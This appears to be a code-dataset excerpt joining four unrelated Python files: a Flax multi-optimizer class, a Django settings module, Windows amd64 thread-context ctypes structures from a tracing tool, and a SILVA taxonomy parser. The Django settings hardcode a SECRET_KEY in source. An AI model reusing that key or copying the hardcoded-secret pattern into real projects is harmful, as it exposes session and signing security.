bias_opt = optim.Momentum(learning_rate=0.1)
opt_def = MultiOptimizer((kernels, kernel_opt), (biases, bias_opt))
optimizer = opt_def.create(model)
In order to train only a subset of the parameters, you can simply use a single
:class:`flax.traverse_util.ModelParamTraversal` instance.
If you want to update the learning rates of both optimizers online with
different learning rate schedules, you should update the learning rates when
applying the gradient. In the following example, the second optimizer is not
doing any optimization during the first 1000 steps::
hparams = optimizer.optimizer_def.hyper_params
new_optimizer = optimizer.apply_gradient(
grads,
hyper_params=[
hparams[0].replace(learning_rate=0.2),
hparams[1].replace(learning_rate=jnp.where(step < 1000, 0., lr)),
])
"""
def __init__(
self,
*traversals_and_optimizers: Tuple[traverse_util.Traversal, OptimizerDef]):
"""Create a new MultiOptimizer.
See docstring of :class:`MultiOptimizer` for more details.
Args:
*traversals_and_optimizers: pairs of flax.traverse_util.Traversal and
`flax.optim.OptimizerDef` instances.
"""
traversals, sub_optimizers = zip(*traversals_and_optimizers)
hyper_params = [opt.hyper_params for opt in sub_optimizers]
super().__init__(hyper_params)
self.traversals = traversals
self.sub_optimizers = sub_optimizers
def init_state(self, params):
param_states = jax.tree_map(_ShapeDtype.create, params)
overlap = False
for idx, (traversal,
opt) in enumerate(zip(self.traversals, self.sub_optimizers)):
for match in traversal.iterate(param_states):
match._indices.append(idx)
overlap |= len(match._indices) > 1
if overlap:
raise ValueError(
'Multiple optimizers match the same leaves : ' +
str(jax.tree_map(lambda match: match._indices, param_states)))
for traversal, opt in zip(self.traversals, self.sub_optimizers):
param_states = traversal.update(lambda x: opt.init_param_state(x._value), param_states)
# Use None as initial state for params that are not optimized by any sub optimizer.
param_states = jax.tree_map(lambda x: None if isinstance(x, _ShapeDtype) else x, param_states)
return OptimizerState(jnp.asarray(0, dtype=jnp.int32), param_states)
def apply_gradient(self, hyper_params, params, state, grads):
new_params = params
it = zip(self.traversals, self.sub_optimizers, hyper_params)
new_param_states = jax.tree_map(_ShapeDtype.create, params)
for focus, opt, hp in it:
ps = tuple(focus.iterate(params))
gs = tuple(focus.iterate(grads))
ss = tuple(focus.iterate(state.param_states))
prev_ss = OptimizerState(state.step, ss)
new_ps, new_ss = opt.apply_gradient(hp, ps, prev_ss, gs)
new_params = focus.set(list(new_ps), new_params)
new_param_states = focus.set(list(new_ss.param_states), new_param_states)
# Update state to None when param is not optimized by any sub optimizer.
new_param_states = jax.tree_map(lambda x: None if isinstance(x, _ShapeDtype) else x, new_param_states)
return new_params, OptimizerState(state.step + 1, new_param_states)
def update_hyper_params(self, **hyper_param_overrides):
"""Updates the hyper parameters with a set of overrides.
This method is called from :meth:`Optimizer.apply_gradient` to create the
hyper parameters for a specific optimization step.
MultiOptimizer will apply the overrides for each sub optimizer.
Args:
**hyper_param_overrides: the hyper parameters updates
will override the defaults specified in the `OptimizerDef`.
Pass `hyper_params=...` to replace all hyper parameters.
Returns:
The new hyper parameters.
"""
hps = hyper_param_overrides.pop('hyper_params', self.hyper_params)
if hyper_param_overrides:
hps = [hp.replace(**hyper_param_overrides) for hp in hps]
return hps
|
google/flax
|
flax/optim/base.py
|
Python
|
apache-2.0
| 20,558
|
# Django settings for seamless project.
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'database.sql3', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.4/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'q34tJ/(oTzQ$34t&$/5ue6sFghS4%56uw5wgSDfghk78W%h24%z2$z3689089=P'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'seamless.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'seamless.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'haystack',
'south',
'api',
'web',
)
import os
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'xapian_backend.XapianEngine',
'PATH': os.path.join(os.path.dirname(__file__), 'xapian_index'),
},
}
# https://github.com/notanumber/xapian-haystack
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
Phaiax/openscad-seamlesslib-server
|
src/seamless/settings.py
|
Python
|
gpl-2.0
| 5,710
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2014, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
CONTEXT structure for amd64.
"""
__revision__ = "$Id: context_amd64.py 1299 2013-12-20 09:30:55Z qvasimodo $"
from defines import *
from version import ARCH_AMD64
import context_i386
#==============================================================================
# This is used later on to calculate the list of exported symbols.
_all = None
_all = set(vars().keys())
#==============================================================================
#--- CONTEXT structures and constants -----------------------------------------
# The following values specify the type of access in the first parameter
# of the exception record when the exception code specifies an access
# violation.
EXCEPTION_READ_FAULT = 0 # exception caused by a read
EXCEPTION_WRITE_FAULT = 1 # exception caused by a write
EXCEPTION_EXECUTE_FAULT = 8 # exception caused by an instruction fetch
CONTEXT_AMD64 = 0x00100000
CONTEXT_CONTROL = (CONTEXT_AMD64 | 0x1L)
CONTEXT_INTEGER = (CONTEXT_AMD64 | 0x2L)
CONTEXT_SEGMENTS = (CONTEXT_AMD64 | 0x4L)
CONTEXT_FLOATING_POINT = (CONTEXT_AMD64 | 0x8L)
CONTEXT_DEBUG_REGISTERS = (CONTEXT_AMD64 | 0x10L)
CONTEXT_MMX_REGISTERS = CONTEXT_FLOATING_POINT
CONTEXT_FULL = (CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_FLOATING_POINT)
CONTEXT_ALL = (CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | \
CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS)
CONTEXT_EXCEPTION_ACTIVE = 0x8000000
CONTEXT_SERVICE_ACTIVE = 0x10000000
CONTEXT_EXCEPTION_REQUEST = 0x40000000
CONTEXT_EXCEPTION_REPORTING = 0x80000000
INITIAL_MXCSR = 0x1f80 # initial MXCSR value
INITIAL_FPCSR = 0x027f # initial FPCSR value
# typedef struct _XMM_SAVE_AREA32 {
# WORD ControlWord;
# WORD StatusWord;
# BYTE TagWord;
# BYTE Reserved1;
# WORD ErrorOpcode;
# DWORD ErrorOffset;
# WORD ErrorSelector;
# WORD Reserved2;
# DWORD DataOffset;
# WORD DataSelector;
# WORD Reserved3;
# DWORD MxCsr;
# DWORD MxCsr_Mask;
# M128A FloatRegisters[8];
# M128A XmmRegisters[16];
# BYTE Reserved4[96];
# } XMM_SAVE_AREA32, *PXMM_SAVE_AREA32;
class XMM_SAVE_AREA32(Structure):
_pack_ = 1
_fields_ = [
('ControlWord', WORD),
('StatusWord', WORD),
('TagWord', BYTE),
('Reserved1', BYTE),
('ErrorOpcode', WORD),
('ErrorOffset', DWORD),
('ErrorSelector', WORD),
('Reserved2', WORD),
('DataOffset', DWORD),
('DataSelector', WORD),
('Reserved3', WORD),
('MxCsr', DWORD),
('MxCsr_Mask', DWORD),
('FloatRegisters', M128A * 8),
('XmmRegisters', M128A * 16),
('Reserved4', BYTE * 96),
]
def from_dict(self):
raise NotImplementedError()
def to_dict(self):
d = dict()
for name, type in self._fields_:
if name in ('FloatRegisters', 'XmmRegisters'):
d[name] = tuple([ (x.LowPart + (x.HighPart << 64)) for x in getattr(self, name) ])
elif name == 'Reserved4':
d[name] = tuple([ chr(x) for x in getattr(self, name) ])
else:
d[name] = getattr(self, name)
return d
LEGACY_SAVE_AREA_LENGTH = sizeof(XMM_SAVE_AREA32)
PXMM_SAVE_AREA32 = ctypes.POINTER(XMM_SAVE_AREA32)
LPXMM_SAVE_AREA32 = PXMM_SAVE_AREA32
# //
# // Context Frame
# //
# // This frame has several purposes: 1) it is used as an argument to
# // NtContinue, 2) it is used to construct a call frame for APC delivery,
# // and 3) it is used in the user level thread creation routines.
# //
# //
# // The flags field within this record controls the contents of a CONTEXT
# // record.
# //
# // If the context record is used as an input parameter, then for each
# // portion of the context record controlled by a flag whose value is
# // set, it is assumed that that portion of the context record contains
# // valid context. If the context record is being used to modify a threads
# // context, then only that portion of the threads context is modified.
# //
# // If the context record is used as an output parameter to capture the
# // context of a thread, then only those portions of the thread's context
# // corresponding to set flags will be returned.
# //
# // CONTEXT_CONTROL specifies SegSs, Rsp, SegCs, Rip, and EFlags.
# //
# // CONTEXT_INTEGER specifies Rax, Rcx, Rdx, Rbx, Rbp, Rsi, Rdi, and R8-R15.
# //
# // CONTEXT_SEGMENTS specifies SegDs, SegEs, SegFs, and SegGs.
# //
# // CONTEXT_DEBUG_REGISTERS specifies Dr0-Dr3 and Dr6-Dr7.
# //
# // CONTEXT_MMX_REGISTERS specifies the floating point and extended registers
# // Mm0/St0-Mm7/St7 and Xmm0-Xmm15.
# //
#
# typedef struct DECLSPEC_ALIGN(16) _CONTEXT {
#
# //
# // Register parameter home addresses.
# //
# // N.B. These fields are for convenience - they could be used to extend the
# // context record in the future.
# //
#
# DWORD64 P1Home;
# DWORD64 P2Home;
# DWORD64 P3Home;
# DWORD64 P4Home;
# DWORD64 P5Home;
# DWORD64 P6Home;
#
# //
# // Control flags.
# //
#
# DWORD ContextFlags;
# DWORD MxCsr;
#
# //
# // Segment Registers and processor flags.
# //
#
# WORD SegCs;
# WORD SegDs;
# WORD SegEs;
# WORD SegFs;
# WORD SegGs;
# WORD SegSs;
# DWORD EFlags;
#
# //
# // Debug registers
# //
#
# DWORD64 Dr0;
# DWORD64 Dr1;
# DWORD64 Dr2;
# DWORD64 Dr3;
# DWORD64 Dr6;
# DWORD64 Dr7;
#
# //
# // Integer registers.
# //
#
# DWORD64 Rax;
# DWORD64 Rcx;
# DWORD64 Rdx;
# DWORD64 Rbx;
# DWORD64 Rsp;
# DWORD64 Rbp;
# DWORD64 Rsi;
# DWORD64 Rdi;
# DWORD64 R8;
# DWORD64 R9;
# DWORD64 R10;
# DWORD64 R11;
# DWORD64 R12;
# DWORD64 R13;
# DWORD64 R14;
# DWORD64 R15;
#
# //
# // Program counter.
# //
#
# DWORD64 Rip;
#
# //
# // Floating point state.
# //
#
# union {
# XMM_SAVE_AREA32 FltSave;
# struct {
# M128A Header[2];
# M128A Legacy[8];
# M128A Xmm0;
# M128A Xmm1;
# M128A Xmm2;
# M128A Xmm3;
# M128A Xmm4;
# M128A Xmm5;
# M128A Xmm6;
# M128A Xmm7;
# M128A Xmm8;
# M128A Xmm9;
# M128A Xmm10;
# M128A Xmm11;
# M128A Xmm12;
# M128A Xmm13;
# M128A Xmm14;
# M128A Xmm15;
# };
# };
#
# //
# // Vector registers.
# //
#
# M128A VectorRegister[26];
# DWORD64 VectorControl;
#
# //
# // Special debug control registers.
# //
#
# DWORD64 DebugControl;
# DWORD64 LastBranchToRip;
# DWORD64 LastBranchFromRip;
# DWORD64 LastExceptionToRip;
# DWORD64 LastExceptionFromRip;
# } CONTEXT, *PCONTEXT;
class _CONTEXT_FLTSAVE_STRUCT(Structure):
_fields_ = [
('Header', M128A * 2),
('Legacy', M128A * 8),
('Xmm0', M128A),
('Xmm1', M128A),
('Xmm2', M128A),
('Xmm3', M128A),
('Xmm4', M128A),
('Xmm5', M128A),
('Xmm6', M128A),
('Xmm7', M128A),
('Xmm8', M128A),
('Xmm9', M128A),
('Xmm10', M128A),
('Xmm11', M128A),
('Xmm12', M128A),
('Xmm13', M128A),
('Xmm14', M128A),
('Xmm15', M128A),
]
def from_dict(self):
raise NotImplementedError()
def to_dict(self):
d = dict()
for name, type in self._fields_:
if name in ('Header', 'Legacy'):
d[name] = tuple([ (x.Low + (x.High << 64)) for x in getattr(self, name) ])
else:
x = getattr(self, name)
d[name] = x.Low + (x.High << 64)
return d
class _CONTEXT_FLTSAVE_UNION(Union):
_fields_ = [
('flt', XMM_SAVE_AREA32),
('xmm', _CONTEXT_FLTSAVE_STRUCT),
]
def from_dict(self):
raise NotImplementedError()
def to_dict(self):
d = dict()
d['flt'] = self.flt.to_dict()
d['xmm'] = self.xmm.to_dict()
return d
class CONTEXT(Structure):
arch = ARCH_AMD64
_pack_ = 16
_fields_ = [
# Register parameter home addresses.
('P1Home', DWORD64),
('P2Home', DWORD64),
('P3Home', DWORD64),
('P4Home', DWORD64),
('P5Home', DWORD64),
('P6Home', DWORD64),
# Control flags.
('ContextFlags', DWORD),
('MxCsr', DWORD),
# Segment Registers and processor flags.
('SegCs', WORD),
('SegDs', WORD),
('SegEs', WORD),
('SegFs', WORD),
('SegGs', WORD),
('SegSs', WORD),
('EFlags', DWORD),
# Debug registers.
('Dr0', DWORD64),
('Dr1', DWORD64),
('Dr2', DWORD64),
('Dr3', DWORD64),
('Dr6', DWORD64),
('Dr7', DWORD64),
# Integer registers.
('Rax', DWORD64),
('Rcx', DWORD64),
('Rdx', DWORD64),
('Rbx', DWORD64),
('Rsp', DWORD64),
('Rbp', DWORD64),
('Rsi', DWORD64),
('Rdi', DWORD64),
('R8', DWORD64),
('R9', DWORD64),
('R10', DWORD64),
('R11', DWORD64),
('R12', DWORD64),
('R13', DWORD64),
('R14', DWORD64),
('R15', DWORD64),
# Program counter.
('Rip', DWORD64),
# Floating point state.
('FltSave', _CONTEXT_FLTSAVE_UNION),
# Vector registers.
('VectorRegister', M128A * 26),
('VectorControl', DWORD64),
# Special debug control registers.
('DebugControl', DWORD64),
('LastBranchToRip', DWORD64),
('LastBranchFromRip', DWORD64),
('LastExceptionToRip', DWORD64),
('LastExceptionFromRip', DWORD64),
]
_others = ('P1Home', 'P2Home', 'P3Home', 'P4Home', 'P5Home', 'P6Home', \
'MxCsr', 'VectorRegister', 'VectorControl')
_control = ('SegSs', 'Rsp', 'SegCs', 'Rip', 'EFlags')
_integer = ('Rax', 'Rcx', 'Rdx', 'Rbx', 'Rsp', 'Rbp', 'Rsi', 'Rdi', \
'R8', 'R9', 'R10', 'R11', 'R12', 'R13', 'R14', 'R15')
_segments = ('SegDs', 'SegEs', 'SegFs', 'SegGs')
_debug = ('Dr0', 'Dr1', 'Dr2', 'Dr3', 'Dr6', 'Dr7', \
'DebugControl', 'LastBranchToRip', 'LastBranchFromRip', \
'LastExceptionToRip', 'LastExceptionFromRip')
_mmx = ('Xmm0', 'Xmm1', 'Xmm2', 'Xmm3', 'Xmm4', 'Xmm5', 'Xmm6', 'Xmm7', \
'Xmm8', 'Xmm9', 'Xmm10', 'Xmm11', 'Xmm12', 'Xmm13', 'Xmm14', 'Xmm15')
# XXX TODO
# Convert VectorRegister and Xmm0-Xmm15 to pure Python types!
@classmethod
def from_dict(cls, ctx):
        'Instantiate a new structure from a Python native type.'
ctx = Context(ctx)
s = cls()
ContextFlags = ctx['ContextFlags']
s.ContextFlags = ContextFlags
for key in cls._others:
if key != 'VectorRegister':
setattr(s, key, ctx[key])
else:
w = ctx[key]
v = (M128A * len(w))()
i = 0
for x in w:
y = M128A()
y.High = x >> 64
                    y.Low = x & 0xFFFFFFFFFFFFFFFF  # keep only the low 64 bits
v[i] = y
i += 1
setattr(s, key, v)
if (ContextFlags & CONTEXT_CONTROL) == CONTEXT_CONTROL:
for key in cls._control:
setattr(s, key, ctx[key])
if (ContextFlags & CONTEXT_INTEGER) == CONTEXT_INTEGER:
for key in cls._integer:
setattr(s, key, ctx[key])
if (ContextFlags & CONTEXT_SEGMENTS) == CONTEXT_SEGMENTS:
for key in cls._segments:
setattr(s, key, ctx[key])
if (ContextFlags & CONTEXT_DEBUG_REGISTERS) == CONTEXT_DEBUG_REGISTERS:
for key in cls._debug:
setattr(s, key, ctx[key])
if (ContextFlags & CONTEXT_MMX_REGISTERS) == CONTEXT_MMX_REGISTERS:
xmm = s.FltSave.xmm
            for key in cls._mmx:
                x = ctx[key]  # bugfix: x was previously left over from the loop above
                y = M128A()
                y.High = x >> 64
                y.Low = x & 0xFFFFFFFFFFFFFFFF  # keep only the low 64 bits
                setattr(xmm, key, y)
return s
def to_dict(self):
'Convert a structure into a Python dictionary.'
ctx = Context()
ContextFlags = self.ContextFlags
ctx['ContextFlags'] = ContextFlags
for key in self._others:
if key != 'VectorRegister':
ctx[key] = getattr(self, key)
else:
ctx[key] = tuple([ (x.Low + (x.High << 64)) for x in getattr(self, key) ])
if (ContextFlags & CONTEXT_CONTROL) == CONTEXT_CONTROL:
for key in self._control:
ctx[key] = getattr(self, key)
if (ContextFlags & CONTEXT_INTEGER) == CONTEXT_INTEGER:
for key in self._integer:
ctx[key] = getattr(self, key)
if (ContextFlags & CONTEXT_SEGMENTS) == CONTEXT_SEGMENTS:
for key in self._segments:
ctx[key] = getattr(self, key)
if (ContextFlags & CONTEXT_DEBUG_REGISTERS) == CONTEXT_DEBUG_REGISTERS:
for key in self._debug:
ctx[key] = getattr(self, key)
if (ContextFlags & CONTEXT_MMX_REGISTERS) == CONTEXT_MMX_REGISTERS:
xmm = self.FltSave.xmm.to_dict()
for key in self._mmx:
ctx[key] = xmm.get(key)
return ctx
PCONTEXT = ctypes.POINTER(CONTEXT)
LPCONTEXT = PCONTEXT
class Context(dict):
"""
Register context dictionary for the amd64 architecture.
"""
arch = CONTEXT.arch
def __get_pc(self):
return self['Rip']
def __set_pc(self, value):
self['Rip'] = value
pc = property(__get_pc, __set_pc)
def __get_sp(self):
return self['Rsp']
def __set_sp(self, value):
self['Rsp'] = value
sp = property(__get_sp, __set_sp)
def __get_fp(self):
return self['Rbp']
def __set_fp(self, value):
self['Rbp'] = value
fp = property(__get_fp, __set_fp)
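# Illustrative usage of the pc/sp/fp aliases above (added sketch, not part
# of the original module; the register values are made up):
#
# >>> ctx = Context(Rip=0x401000, Rsp=0x7fff0000, Rbp=0x7fff0040)
# >>> hex(ctx.pc)
# '0x401000'
# >>> ctx.pc += 2           # e.g. step over a two-byte instruction
# >>> ctx['Rip'] == ctx.pc
# True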
#--- LDT_ENTRY structure ------------------------------------------------------
# typedef struct _LDT_ENTRY {
# WORD LimitLow;
# WORD BaseLow;
# union {
# struct {
# BYTE BaseMid;
# BYTE Flags1;
# BYTE Flags2;
# BYTE BaseHi;
# } Bytes;
# struct {
# DWORD BaseMid :8;
# DWORD Type :5;
# DWORD Dpl :2;
# DWORD Pres :1;
# DWORD LimitHi :4;
# DWORD Sys :1;
# DWORD Reserved_0 :1;
# DWORD Default_Big :1;
# DWORD Granularity :1;
# DWORD BaseHi :8;
# } Bits;
# } HighWord;
# } LDT_ENTRY,
# *PLDT_ENTRY;
class _LDT_ENTRY_BYTES_(Structure):
_pack_ = 1
_fields_ = [
('BaseMid', BYTE),
('Flags1', BYTE),
('Flags2', BYTE),
('BaseHi', BYTE),
]
class _LDT_ENTRY_BITS_(Structure):
_pack_ = 1
_fields_ = [
('BaseMid', DWORD, 8),
('Type', DWORD, 5),
('Dpl', DWORD, 2),
('Pres', DWORD, 1),
('LimitHi', DWORD, 4),
('Sys', DWORD, 1),
('Reserved_0', DWORD, 1),
('Default_Big', DWORD, 1),
('Granularity', DWORD, 1),
('BaseHi', DWORD, 8),
]
class _LDT_ENTRY_HIGHWORD_(Union):
_pack_ = 1
_fields_ = [
('Bytes', _LDT_ENTRY_BYTES_),
('Bits', _LDT_ENTRY_BITS_),
]
class LDT_ENTRY(Structure):
_pack_ = 1
_fields_ = [
('LimitLow', WORD),
('BaseLow', WORD),
('HighWord', _LDT_ENTRY_HIGHWORD_),
]
PLDT_ENTRY = POINTER(LDT_ENTRY)
LPLDT_ENTRY = PLDT_ENTRY
#--- WOW64 CONTEXT structure and constants ------------------------------------
# Value of SegCs in a Wow64 thread when running in 32 bits mode
WOW64_CS32 = 0x23
WOW64_CONTEXT_i386 = 0x00010000L
WOW64_CONTEXT_i486 = 0x00010000L
WOW64_CONTEXT_CONTROL = (WOW64_CONTEXT_i386 | 0x00000001L)
WOW64_CONTEXT_INTEGER = (WOW64_CONTEXT_i386 | 0x00000002L)
WOW64_CONTEXT_SEGMENTS = (WOW64_CONTEXT_i386 | 0x00000004L)
WOW64_CONTEXT_FLOATING_POINT = (WOW64_CONTEXT_i386 | 0x00000008L)
WOW64_CONTEXT_DEBUG_REGISTERS = (WOW64_CONTEXT_i386 | 0x00000010L)
WOW64_CONTEXT_EXTENDED_REGISTERS = (WOW64_CONTEXT_i386 | 0x00000020L)
WOW64_CONTEXT_FULL = (WOW64_CONTEXT_CONTROL | WOW64_CONTEXT_INTEGER | WOW64_CONTEXT_SEGMENTS)
WOW64_CONTEXT_ALL = (WOW64_CONTEXT_CONTROL | WOW64_CONTEXT_INTEGER | WOW64_CONTEXT_SEGMENTS | WOW64_CONTEXT_FLOATING_POINT | WOW64_CONTEXT_DEBUG_REGISTERS | WOW64_CONTEXT_EXTENDED_REGISTERS)
WOW64_SIZE_OF_80387_REGISTERS = 80
WOW64_MAXIMUM_SUPPORTED_EXTENSION = 512
class WOW64_FLOATING_SAVE_AREA (context_i386.FLOATING_SAVE_AREA):
pass
class WOW64_CONTEXT (context_i386.CONTEXT):
pass
class WOW64_LDT_ENTRY (context_i386.LDT_ENTRY):
pass
PWOW64_FLOATING_SAVE_AREA = POINTER(WOW64_FLOATING_SAVE_AREA)
PWOW64_CONTEXT = POINTER(WOW64_CONTEXT)
PWOW64_LDT_ENTRY = POINTER(WOW64_LDT_ENTRY)
#==============================================================================
# This calculates the list of exported symbols.
_all = set(vars().keys()).difference(_all)
__all__ = [_x for _x in _all if not _x.startswith('_')]
__all__.sort()
#==============================================================================
|
icchy/tracecorn
|
unitracer/lib/windows/amd64/context_amd64.py
|
Python
|
mit
| 21,234
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################################################
# Previous silva handling code that served as a basis for this code was written by JAR and
# Jessica Grant as a part of the reference_taxonomy and OToL efforts.
from __future__ import print_function
import io
import os
import logging
from peyutil import (assure_dir_exists,
read_as_json,
write_as_json)
from taxalotl.commands import unpack_resources
from taxalotl.ott_schema import InterimTaxonomyData
from taxalotl.cmds.partitions import GEN_MAPPING_FILENAME
from taxalotl.resource_wrapper import TaxonomyWrapper
from taxalotl.util import OutFile
_LOG = logging.getLogger(__name__)
def parse_silva_ids(fn):
preferred = set()
with io.open(fn, 'rU', encoding='utf-8') as inp:
for line in inp:
ls = line.strip()
if ls:
preferred.add(ls)
return preferred
# noinspection PyUnusedLocal
def normalize_silva_taxonomy(source, destination, res_wrapper):
assure_dir_exists(destination)
depends_on = res_wrapper.depends_on
taxalotl_config = res_wrapper.config
expect_id_fp, ncbi_mapping_res = None, None
for dep_id in depends_on:
dep_res = taxalotl_config.get_terminalized_res_by_id(dep_id, 'normalize silva')
if not dep_res.has_been_unpacked():
unpack_resources(taxalotl_config, [dep_id])
if dep_res.schema.lower() == 'id list':
dep_fp = os.path.join(dep_res.unpacked_filepath, dep_res.local_filename)
expect_id_fp = dep_fp
elif dep_res.schema.lower() in {'silva taxmap', "fasta silva taxmap"}:
dep_fp = dep_res.normalized_filepath
ncbi_mapping_res = dep_res
else:
raise ValueError('unrecognized dependency schema {}'.format(dep_res.schema))
if not os.path.isfile(dep_fp):
raise ValueError("Silva processing dependency not found at: {}".format(dep_fp))
if expect_id_fp is None:
raise ValueError('ID list dependency not found.')
if ncbi_mapping_res is None:
raise ValueError('NCBI mapping dependency not found.')
expect_tax_fp = os.path.join(res_wrapper.unpacked_filepath, res_wrapper.local_filename)
if not os.path.isfile(expect_tax_fp):
raise ValueError("Silva taxon file not found at: {}".format(expect_tax_fp))
acc_to_trim = ncbi_mapping_res.parse_acc_to_trim_from_ncbi()
preferred = parse_silva_ids(expect_id_fp)
itd = InterimTaxonomyData()
part_name_to_silva_id = parse_silva_taxon_file(expect_tax_fp, preferred, acc_to_trim, itd)
_LOG.info('{} taxonomy IDs read'.format(len(itd.to_par)))
res_wrapper.post_process_interim_tax_data(itd)
itd.write_to_dir(destination)
mapping_file = os.path.join(destination, GEN_MAPPING_FILENAME)
with OutFile(mapping_file) as outs:
write_as_json(part_name_to_silva_id, outs, indent=2)
def gen_all_namepaths(path, name, prim_acc):
an = []
while path.endswith(';'):
path = path[:-1]
if name:
if '(' in name:
name = name.split('(')[0].strip()
an.append(((path, name), prim_acc))
ps = path.split(';')
prev = ''
for n, el in enumerate(ps):
if not el:
continue
one_based = 1 + n
np = (prev, el)
prop_id = '{}/#{}'.format(prim_acc, one_based)
an.append((np, prop_id))
if prev:
prev = '{};{}'.format(prev, el)
else:
prev = el
return an
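# Illustration (added, not in the original source): gen_all_namepaths emits
# one entry for the tip name plus one per path element, with proposed IDs
# derived from the primary accession:
#
# >>> gen_all_namepaths('A;B', 'C', 'ACC1')
# [(('A;B', 'C'), 'ACC1'), (('', 'A'), 'ACC1/#1'), (('A', 'B'), 'ACC1/#2')]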
def parse_silva_taxon_file(expect_tax_fp, preferred_ids, acc_to_trim, itd):
fung_pref = 'Eukaryota;Opisthokonta;Nucletmycea;Fungi;'
